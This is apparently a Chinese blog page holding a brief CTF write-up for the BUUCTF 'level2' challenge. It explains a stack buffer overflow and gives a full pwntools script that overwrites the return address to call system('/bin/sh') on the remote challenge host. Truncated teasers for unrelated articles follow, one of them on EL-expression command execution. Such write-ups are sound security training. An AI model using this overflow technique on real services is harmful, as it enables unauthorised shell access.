张小明
前端开发工程师
使用checksec打开文件查看保护
使用ida打开文件,发现主函数没有什么特别的,直接跟进vulnerable_function函数
发现存在read函数,并且buf缓冲区可以被溢出,由于保护只开启了栈不可执行,因此我们查找一下后门函数
通过plt表来跳转到system函数
system执行完后需要有个返回地址,于是我们随便给个合法地址,在之后写入bin_sh的地址
来让其执行system("/bin/sh")
from pwn import * #p=process('./level2') p=remote('node5.buuoj.cn',25681) system_addr = 0x08048320 fake_ret = 0x08048480 bin_sh = 0x0804A024 pay=b'a'*140+ p32(system_addr) + p32(fake_ret) + p32(bin_sh) p.sendline(pay) p.interactive()Qwen1.5模型能力评估实战指南:从基础配置到专业优化 【免费下载链接】Qwen1.5 项目地址: https://gitcode.com/GitHub_Trending/qw/Qwen1.5 想要全面掌握Qwen1.5大语言模型的真实性能表现?本指南将带你从零开始,构建完整的评估流程&a…
李华
在数字化浪潮席卷全球的今天,构建引人入胜的沉浸式体验平台已成为企业和开发者的迫切需求。React 360作为基于React的虚拟现实开发框架,为创建360度和VR内容提供了强大的技术支撑。本文将深入探讨如何利用React 360构建功能丰富的数字体验平台࿰…
李华
EL表达式实现命令执行 EL 表达式基础 Java Expression Language(EL)适用于 java EE 程序(尤其是 JSP 和 JSF)中简化数据访问和表达式计算的语言。EL主要用于在 JSP/JSF 页面中从 Javga 对象获取数据、调用方法等操作。在 JSP 中…
李华
作为福建某互联网上市公司项目负责人,我近期正为“大文件传输功能集成”课题带领团队攻坚——公司现有产品已服务金融、能源、政务等领域的200客户,其中超30%的国企、央企客户明确提出“100G大文件传输文件夹层级保留断点续传”的刚性需求。但市场上多数…
李华
macOS iSCSI存储扩展方案:让苹果电脑变身网络存储中心 【免费下载链接】iSCSIInitiator iSCSI Initiator for macOS 项目地址: https://gitcode.com/gh_mirrors/is/iSCSIInitiator 想要为您的Mac电脑增加无限存储空间吗?macOS iSCSI Initiator是一…
李华
PyTorch实战:从数据清洗到模型优化的温度预测全流程指南 【免费下载链接】Pytorch-framework-predicts-temperature PyTorch构建神经网络预测气温 项目地址: https://gitcode.com/gh_mirrors/py/Pytorch-framework-predicts-temperature 温度预测作为时间序列…
李华